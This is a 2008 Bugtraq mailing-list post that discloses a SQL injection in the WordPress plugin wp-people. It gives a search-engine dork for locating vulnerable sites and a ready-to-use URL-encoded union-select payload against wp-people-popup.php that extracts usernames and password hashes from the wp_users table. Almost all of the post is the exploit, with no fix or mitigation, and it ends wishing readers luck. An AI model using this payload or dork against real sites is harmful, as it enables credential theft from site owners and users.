Bugtraq mailing list archives

Wordpress Plugin (wp-people) SQL Injection

From: hackturkiye.hackturkiye () gmail com
Date: 16 Feb 2008 16:52:09 -0000

#########################################################################
# 
#   Wordpress Plugin (wp-people) SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com/ 
#
#########################################################################
# 
#  DORKS 1 : allinurl :"allinurl:  "wp-people""
# 
##########################################################################
   EXPLOIT : 

wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
  

##########################################################################
# S@BUN        GOOD LUCKY       S@BUN 
##########################################################################

Current thread:

Wordpress Plugin (wp-people) SQL Injection hackturkiye . hackturkiye (Feb 18)